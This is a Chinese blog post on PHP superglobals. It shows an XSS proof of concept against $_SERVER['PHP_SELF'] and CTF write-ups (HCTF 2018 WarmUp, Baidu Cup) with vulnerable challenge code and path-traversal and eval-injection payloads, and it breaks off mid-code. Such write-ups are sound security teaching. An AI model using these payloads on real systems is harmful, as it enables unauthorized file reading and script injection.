<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="theme-color" content="#d8f3ff">
<title>php特性</title>

  <style>
    :root { --wallpaper: url("/images/wallpaper.jpg"); }
  </style>

<link rel="stylesheet" href="/css/main.css">
<script defer src="/js/main.js"></script>

<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 6.3.0"></head>
<body class="theme-mac js is-article-page has-wallpaper">
  <div class="menu-bar">
  <div class="menu-left">
    <div class="menu-apple" id="menu-apple">
      <button class="menu-apple-btn" id="menu-apple-btn" type="button" aria-haspopup="true" aria-expanded="false" aria-label="Apple">
        <svg class="menu-apple-icon" viewBox="0 0 24 24" aria-hidden="true">
          <path d="M16.36 2.2c0 1.05-.43 2.06-1.15 2.8-.8.83-2.12 1.47-3.25 1.39-.13-1.11.34-2.2 1.1-2.95.75-.81 2.06-1.42 3.3-1.24z"/>
          <path d="M19.2 8.3c-.97-1.23-2.32-1.95-3.59-1.95-1.69 0-2.4.81-3.58.81-1.21 0-2.12-.79-3.6-.79-1.43 0-2.95.87-3.92 2.36-1.37 2.1-1.13 6.05 1.08 9.42.8 1.21 1.86 2.57 3.23 2.56 1.19-.01 1.53-.76 3.2-.76 1.67 0 1.98.76 3.19.75 1.41-.01 2.55-1.51 3.33-2.72.58-.89.8-1.34 1.24-2.35-3.26-1.24-3.78-5.87-.58-7.33z"/>
        </svg>
      </button>
      <div class="menu-dropdown" id="menu-apple-dropdown" role="menu">
        <button class="menu-dropdown-item" type="button" data-open="about">关于本机</button>
        <div class="menu-divider"></div>
        <button class="menu-dropdown-item" type="button">系统设置...</button>
        <button class="menu-dropdown-item" type="button">App Store...</button>
        <div class="menu-divider"></div>
        <button class="menu-dropdown-item" type="button">关机...</button>
      </div>
    </div>
    <span class="menu-item brand">Finder</span>
    <span class="menu-item">File</span>
    <span class="menu-item">Edit</span>
    <span class="menu-item">View</span>
    <span class="menu-item">Go</span>
    <span class="menu-item">Window</span>
    <span class="menu-item">Help</span>
  </div>
  <div class="menu-right">
    <span class="menu-item status icon" aria-label="WeChat" title="WeChat">
      <svg class="menu-icon" viewBox="0 0 24 24" role="img" aria-hidden="true">
        <path d="M8.5 6.5c-3.2 0-5.8 2.1-5.8 4.8 0 1.7 1 3.3 2.6 4.2l-.6 2.3 2.3-1.2c.5.1 1 .2 1.5.2 3.2 0 5.8-2.1 5.8-4.8S11.7 6.5 8.5 6.5z"/>
        <path d="M15.5 11c3.1 0 5.7 2.1 5.7 4.7 0 1.5-.8 2.9-2.2 3.8l.5 2-2.1-1.1c-.4.1-.9.1-1.4.1-3.1 0-5.7-2.1-5.7-4.7S12.4 11 15.5 11z"/>
      </svg>
    </span>
    <span class="menu-item status icon" aria-label="QQ" title="QQ">
      <svg class="menu-icon" viewBox="0 0 24 24" role="img" aria-hidden="true">
        <path d="M7 18c-1.4 0-2.6 1-2.6 2.3 0 1.1 1 2.1 2.6 2.1h10c1.6 0 2.6-1 2.6-2.1 0-1.3-1.2-2.3-2.6-2.3"/>
        <path d="M6.5 12.5c-1.2 2.1-1.7 4.2-1.7 5.5M17.5 12.5c1.2 2.1 1.7 4.2 1.7 5.5"/>
        <path d="M12 4.2c-3.6 0-6.5 3-6.5 6.7 0 3.7 2.9 6.7 6.5 6.7s6.5-3 6.5-6.7c0-3.7-2.9-6.7-6.5-6.7z"/>
      </svg>
    </span>
    <span class="menu-item status icon" aria-label="Bluetooth" title="Bluetooth">
      <svg class="menu-icon" viewBox="0 0 24 24" role="img" aria-hidden="true">
        <path d="M7 6l10 10-5 4V4l5 4-10 10"/>
      </svg>
    </span>
    <span class="menu-item status icon" aria-label="Wi-Fi" title="Wi-Fi">
      <svg class="menu-icon" viewBox="0 0 24 24" role="img" aria-hidden="true">
        <path d="M3.5 9.5a12 12 0 0 1 17 0"/>
        <path d="M6.8 12.8a7.2 7.2 0 0 1 10.4 0"/>
        <path d="M10.4 16.4a2.6 2.6 0 0 1 3.2 0"/>
        <circle cx="12" cy="19" r="1.2" fill="currentColor" stroke="none"/>
      </svg>
    </span>
    <span class="menu-item status icon" aria-label="Battery" title="Battery">
      <svg class="menu-icon" viewBox="0 0 24 24" role="img" aria-hidden="true">
        <rect x="3" y="7.5" width="16" height="9" rx="2"/>
        <rect x="19" y="10" width="2" height="4" rx="1"/>
        <rect x="5.2" y="9.6" width="11.4" height="4.8" rx="1.2" fill="currentColor" stroke="none"/>
      </svg>
    </span>
    <span class="menu-item" id="menu-time">--:--</span>
  </div>
</div>


  <main class="desktop">
    <div class="window wide reveal" style="--delay: 120ms;">
      <div class="window-bar">
        <div class="traffic">
          <a class="traffic-dot red traffic-button" href="/" aria-label="Close"></a>
          <span class="traffic-dot yellow"></span>
          <button class="traffic-dot green traffic-button traffic-max" type="button" aria-label="Maximize"></button>
        </div>
        <div class="window-title">php特性</div>
        <div class="window-actions">
          <a class="window-link" href="/">Desktop</a>
          
          
            <a class="window-link" href="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/" target="_blank" rel="noopener">Share</a>
          
        </div>
      </div>
      <div class="window-body">
        
        <div class="article-head">
          <h1 class="article-title">php特性</h1>
          
            <div class="article-meta">2019-04-11</div>
          
        </div>
        <article class="markdown">
          <h4 id="1、超级全局变量"><a href="#1、超级全局变量" class="headerlink" title="1、超级全局变量"></a>1、超级全局变量</h4><p>超级全局变量在PHP 4.1.0之后被启用, 是PHP系统中自带的变量，在一个脚本的全部作用域中都可用。<br>$_SERVER[“PHP_SELF”];</p>
<h4 id="PHP中预定义了几个超级全局变量（superglobals）-，这意味着它们在一个脚本的全部作用域中都可用。-你不需要特别说明，就可以在函数及类中使用。"><a href="#PHP中预定义了几个超级全局变量（superglobals）-，这意味着它们在一个脚本的全部作用域中都可用。-你不需要特别说明，就可以在函数及类中使用。" class="headerlink" title="PHP中预定义了几个超级全局变量（superglobals） ，这意味着它们在一个脚本的全部作用域中都可用。 你不需要特别说明，就可以在函数及类中使用。"></a>PHP中预定义了几个超级全局变量（superglobals） ，这意味着它们在一个脚本的全部作用域中都可用。 你不需要特别说明，就可以在函数及类中使用。</h4><span id="more"></span>


<p>PHP 超级全局变量列表:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">1. $GLOBALS</span><br><span class="line">2. $_SERVER</span><br><span class="line">3. $_REQUEST</span><br><span class="line">4. $_POST</span><br><span class="line">5. $_GET</span><br><span class="line">6. $_FILES</span><br><span class="line">7. $_ENV</span><br><span class="line">8. $_COOKIE</span><br><span class="line">9. $_SESSION</span><br></pre></td></tr></table></figure>

<h4 id="2、PHP-SERVER"><a href="#2、PHP-SERVER" class="headerlink" title="2、PHP $_SERVER"></a>2、PHP $_SERVER</h4><p>$_SERVER 是一个包含了诸如头信息(header)、路径(path)、以及脚本位置(script locations)等等信息的数组。这个数组中的项目由 Web 服务器创建。不能保证每个服务器都提供全部项目；服务器可能会忽略一些，或者提供一些没有在这里列举出来的项目。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php </span><br><span class="line">echo $_SERVER[&#x27;PHP_SELF&#x27;];</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $_SERVER[&#x27;SERVER_NAME&#x27;];</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $_SERVER[&#x27;HTTP_HOST&#x27;];</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $_SERVER[&#x27;HTTP_REFERER&#x27;];</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $_SERVER[&#x27;HTTP_USER_AGENT&#x27;];</span><br><span class="line">echo &quot;&lt;br&gt;&quot;;</span><br><span class="line">echo $_SERVER[&#x27;SCRIPT_NAME&#x27;];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<h4 id="3、-SERVER-’PHP-SELF’-的跨站脚本攻击"><a href="#3、-SERVER-’PHP-SELF’-的跨站脚本攻击" class="headerlink" title="3、$_SERVER[’PHP_SELF’]的跨站脚本攻击"></a>3、$_SERVER[’PHP_SELF’]的跨站脚本攻击</h4><p>$_SERVER[‘PHP_SELF’]是PHP语言中的“服务器端系统变量”，它的值是当前php文件相对于网站根目录的位置地址.<br>比如当</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">echo $_SERVER[&#x27;PHP_SELF&#x27;];</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>正常访问是这样的<br><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/1.png"><br>显然这样可以很方便XSS，因为直接echo在页面上，所以只需要在尾部加上<code>/&lt;script&gt;alert(&quot;Hello&quot;)&lt;/script&gt;</code>即可，建议大家先URL加密一次，不过问题不大<br><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/2.png"><br>当然正常的代码不会直接输出在界面上，但是当开发人员一个表单的在action本页面，则可能会</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;&lt;?php echo $_SERVER[&quot;PHP_SELF&quot;];?&gt;&quot;method=&quot;POST&quot;&gt;</span><br><span class="line">.....</span><br><span class="line">&lt;/form&gt;</span><br></pre></td></tr></table></figure>
<p>正常访问是这样的</p>
<p><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/3.png"></p>
<p>但是 当你在尾部加上</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/&quot;&gt;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;</span><br></pre></td></tr></table></figure>
<p>则由原来生成的</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;/demo.php/&#123;&#123;多加入的参数&#125;&#125;&quot; method=&quot;POST&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>变成了，符号是自己加上去，表示区分</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;/demo.php/&#123;&#123;&quot;&gt;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;&#125;&#125;&quot; method=&quot;POST&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>最终</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;form action=&quot;/demo.php/&quot;&gt;&lt;script&gt;alert(&#x27;xss&#x27;)&lt;/script&gt;&quot; method=&quot;POST&quot;&gt;</span><br></pre></td></tr></table></figure>
<p>成功执行了XSS<br><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/4.png"><br><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/5.png"></p>
<h4 id="3-1、解决办法-通过htmlentities-SERVER-‘PHP-SELF’-过滤"><a href="#3-1、解决办法-通过htmlentities-SERVER-‘PHP-SELF’-过滤" class="headerlink" title="3.1、解决办法-&gt; 通过htmlentities($_SERVER[‘PHP_SELF’]);过滤"></a>3.1、解决办法-&gt; 通过htmlentities($_SERVER[‘PHP_SELF’]);过滤</h4><h4 id="PS-SERVER-变量中的重要元素"><a href="#PS-SERVER-变量中的重要元素" class="headerlink" title="PS:$_SERVER 变量中的重要元素:"></a>PS:$_SERVER 变量中的重要元素:</h4><table>
<thead>
<tr>
<th>元素&#x2F;代码</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>$_SERVER[‘PHP_SELF’]</td>
<td>返回当前执行脚本的文件名。</td>
</tr>
<tr>
<td>$_SERVER[‘GATEWAY_INTERFACE’]</td>
<td>返回服务器使用的 CGI 规范的版本。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_ADDR’]</td>
<td>返回当前运行脚本所在的服务器的 IP 地址。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_NAME’]</td>
<td>返回当前运行脚本所在的服务器的主机名。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_SOFTWARE’]</td>
<td>返回服务器标识字符串（比如 Apache&#x2F;2.2.24）。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_PROTOCOL’]</td>
<td>返回请求页面时通信协议的名称和版本（例如，“HTTP&#x2F;1.0”）。</td>
</tr>
<tr>
<td>$_SERVER[‘REQUEST_METHOD’]</td>
<td>返回访问页面使用的请求方法（例如 POST）。</td>
</tr>
<tr>
<td>$_SERVER[‘REQUEST_TIME’]</td>
<td>返回请求开始时的时间戳（例如 1577687494）。</td>
</tr>
<tr>
<td>$_SERVER[‘QUERY_STRING’]</td>
<td>返回查询字符串，如果是通过查询字符串访问此页面。</td>
</tr>
<tr>
<td>$_SERVER[‘HTTP_ACCEPT’]</td>
<td>返回来自当前请求的请求头。</td>
</tr>
<tr>
<td>$_SERVER[‘HTTP_ACCEPT_CHARSET’]</td>
<td>返回来自当前请求的 Accept_Charset 头（ 例如 utf-8,ISO-8859-1）</td>
</tr>
<tr>
<td>$_SERVER[‘HTTP_HOST’]</td>
<td>返回来自当前请求的 Host 头。</td>
</tr>
<tr>
<td>$_SERVER[‘HTTP_REFERER’]</td>
<td>返回当前页面的完整 URL（不可靠，因为不是所有用户代理都支持）。</td>
</tr>
<tr>
<td>$_SERVER[‘HTTPS’]</td>
<td>是否通过安全 HTTP 协议查询脚本。</td>
</tr>
<tr>
<td>$_SERVER[‘REMOTE_ADDR’]</td>
<td>返回浏览当前页面的用户的 IP 地址。</td>
</tr>
<tr>
<td>$_SERVER[‘REMOTE_HOST’]</td>
<td>返回浏览当前页面的用户的主机名。</td>
</tr>
<tr>
<td>$_SERVER[‘REMOTE_PORT’]</td>
<td>返回用户机器上连接到 Web 服务器所使用的端口号。</td>
</tr>
<tr>
<td>$_SERVER[‘SCRIPT_FILENAME’]</td>
<td>返回当前执行脚本的绝对路径。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_ADMIN’]</td>
<td>该值指明了 Apache 服务器配置文件中的 SERVER_ADMIN 参数。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_PORT’]</td>
<td>Web 服务器使用的端口。默认值为 “80”。</td>
</tr>
<tr>
<td>$_SERVER[‘SERVER_SIGNATURE’]</td>
<td>返回服务器版本和虚拟主机名。</td>
</tr>
<tr>
<td>$_SERVER[‘PATH_TRANSLATED’]</td>
<td>当前脚本所在文件系统（非文档根目录）的基本路径。</td>
</tr>
<tr>
<td>$_SERVER[‘SCRIPT_NAME’]</td>
<td>返回当前脚本的路径。</td>
</tr>
<tr>
<td>$_SERVER[‘SCRIPT_URI’]</td>
<td>返回当前页面的 URI。</td>
</tr>
</tbody></table>
<h4 id="PHP中preg-match正则匹配的-u-i-s是什么意思"><a href="#PHP中preg-match正则匹配的-u-i-s是什么意思" class="headerlink" title="PHP中preg_match正则匹配的&#x2F;u &#x2F;i  &#x2F;s是什么意思"></a>PHP中preg_match正则匹配的&#x2F;u &#x2F;i  &#x2F;s是什么意思</h4><p>&#x2F;u 表示按unicode(utf-8)匹配（主要针对多字节比如汉字）<br>&#x2F;i 表示不区分大小写（如果表达式里面有 a， 那么 A 也是匹配对象）<br>&#x2F;s 表示将字符串视为单行来匹配</p>
<h4 id="HCTF-2018-WarmUp"><a href="#HCTF-2018-WarmUp" class="headerlink" title="[HCTF 2018]WarmUp"></a>[HCTF 2018]WarmUp</h4><p>Orz啥都不说了，先膜两张图<br><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/21.png"><br><img src="/2019/04/11/%E4%B9%8B%E5%89%8D%E7%9A%84/PHP%E7%89%B9%E6%80%A7/22.png"><br>上图中能发现两个特性，一个是win10真的金贵，一个就是<code>demo?/../flag.txt</code>能直接包含到flag.txt这是为啥呢</p>
<!--more-->
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">原理是demo?/被当作目录，之后上跳目录就好了（这个只适用于linux）</span><br></pre></td></tr></table></figure>
<p>OrZ<br>然后这个审计的题目</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">emmm</span></span></span><br><span class="line"><span class="class">    </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params">&amp;<span class="variable">$page</span></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="variable">$whitelist</span> = [<span class="string">&quot;source&quot;</span>=&gt;<span class="string">&quot;source.php&quot;</span>,<span class="string">&quot;hint&quot;</span>=&gt;<span class="string">&quot;hint.php&quot;</span>];</span><br><span class="line">            <span class="keyword">if</span> (! <span class="keyword">isset</span>(<span class="variable">$page</span>) || !<span class="title function_ invoke__">is_string</span>(<span class="variable">$page</span>)) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(</span><br><span class="line">                <span class="variable">$page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">            <span class="variable">$_page</span> = <span class="title function_ invoke__">urldecode</span>(<span class="variable">$page</span>);</span><br><span class="line">            <span class="variable">$_page</span> = <span class="title function_ invoke__">mb_substr</span>(</span><br><span class="line">                <span class="variable">$_page</span>,</span><br><span class="line">                <span class="number">0</span>,</span><br><span class="line">                <span class="title function_ invoke__">mb_strpos</span>(<span class="variable">$_page</span> . <span class="string">&#x27;?&#x27;</span>, <span class="string">&#x27;?&#x27;</span>)</span><br><span class="line">            );</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="variable">$_page</span>, <span class="variable">$whitelist</span>)) &#123;</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;you can&#x27;t see it&quot;</span>;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (! <span class="keyword">empty</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; <span class="title function_ invoke__">is_string</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">        &amp;&amp; emmm::<span class="title function_ invoke__">checkFile</span>(<span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>])</span><br><span class="line">    ) &#123;</span><br><span class="line">        <span class="keyword">include</span> <span class="variable">$_REQUEST</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line">        <span class="keyword">exit</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;img src=\&quot;https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\&quot; /&gt;&quot;</span>;</span><br><span class="line">    &#125;  </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>利用方法其实有两种，第一种是通过url两次编码的问题然后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">整体的思路就是第一段不出现?，第二段又要出现?。</span><br><span class="line">所以进行二次urlencode编码， %253f</span><br><span class="line">浏览器会自动解码一次变成%3f，再经过代码的urldecode()变成?。</span><br><span class="line">接下来就是文件包含了-但是感觉和直接读取一样的</span><br></pre></td></tr></table></figure>
<p>paylaod&#x3D;<code>file=source.php%253f/../../../../ffffllllaaaagggg</code><br>方法二就是用上面的那个漏洞,直接读取</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=source.php?/../../../../../ffffllllaaaagggg</span><br></pre></td></tr></table></figure>
<h4 id="“百度杯”CTF比赛-2017-二月场爆破-1"><a href="#“百度杯”CTF比赛-2017-二月场爆破-1" class="headerlink" title="“百度杯”CTF比赛 2017 二月场爆破-1"></a>“百度杯”CTF比赛 2017 二月场爆破-1</h4><p>描述<code>flag就在某六位变量中。</code><br>题目的意思是flag.php中定义了一个flag字符串 我们传递hello如果为那个变量 那个$$a就能把flag丢出来</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="variable">$a</span> = @<span class="variable">$_REQUEST</span>[<span class="string">&#x27;hello&#x27;</span>];</span><br><span class="line"><span class="keyword">if</span>(!<span class="title function_ invoke__">preg_match</span>(<span class="string">&#x27;/^\w*$/&#x27;</span>,<span class="variable">$a</span> ))&#123;</span><br><span class="line">  <span class="keyword">die</span>(<span class="string">&#x27;ERROR&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">eval</span>(<span class="string">&quot;var_dump($<span class="subst">$a</span>);&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>爆破的话贼恶心，所以正确的姿势应该是 <code>hello=GLOBALS</code>,使用超全局变量GLOBALS</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://138c4d7d85c04385b91b779047d5906d0a331ddc3728405a.changame.ichunqiu.com/?hello=GLOBALS</span><br><span class="line">得到</span><br><span class="line">[&quot;d3f0f8&quot;]=&gt; string(42) &quot;flag&#123;bfed2cef-1a03-4337-9f55-b00ddbcc5f0a&#125;</span><br></pre></td></tr></table></figure>


<h4 id="“百度杯”CTF比赛-2017-二月场爆破-2"><a href="#“百度杯”CTF比赛-2017-二月场爆破-2" class="headerlink" title="“百度杯”CTF比赛 2017 二月场爆破-2"></a>“百度杯”CTF比赛 2017 二月场爆破-2</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="variable">$a</span> = @<span class="variable">$_REQUEST</span>[<span class="string">&#x27;hello&#x27;</span>];</span><br><span class="line"><span class="keyword">eval</span>( <span class="string">&quot;var_dump(<span class="subst">$a</span>);&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">show_source</span>(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://4139dc5d40184be4bb481b0d09226223d3815a7b2aea4456.changame.ichunqiu.com/?hello=file_get_contents(&#x27;flag.php&#x27;)</span><br></pre></td></tr></table></figure>

<h4 id="“百度杯”CTF比赛-2017-二月场爆破-3"><a href="#“百度杯”CTF比赛-2017-二月场爆破-3" class="headerlink" title="“百度杯”CTF比赛 2017 二月场爆破-3"></a>“百度杯”CTF比赛 2017 二月场爆破-3</h4><p>题目描述:<code>这个真的是爆破</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="title function_ invoke__">session_start</span>();</span><br><span class="line"><span class="keyword">require</span>(<span class="string">&#x27;./flag.php&#x27;</span>);</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;nums&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$_SESSION</span>[<span class="string">&#x27;nums&#x27;</span>] = <span class="number">0</span>;</span><br><span class="line">  <span class="variable">$_SESSION</span>[<span class="string">&#x27;time&#x27;</span>] = <span class="title function_ invoke__">time</span>();</span><br><span class="line">  <span class="variable">$_SESSION</span>[<span class="string">&#x27;whoami&#x27;</span>] = <span class="string">&#x27;ea&#x27;</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;time&#x27;</span>]+<span class="number">120</span>&lt;<span class="title function_ invoke__">time</span>())&#123;</span><br><span class="line">  <span class="title function_ invoke__">session_destroy</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$value</span> = <span class="variable">$_REQUEST</span>[<span class="string">&#x27;value&#x27;</span>];</span><br><span class="line"><span class="variable">$str_rand</span> = <span class="title function_ invoke__">range</span>(<span class="string">&#x27;a&#x27;</span>, <span class="string">&#x27;z&#x27;</span>);</span><br><span class="line"><span class="variable">$str_rands</span> = <span class="variable">$str_rand</span>[<span class="title function_ invoke__">mt_rand</span>(<span 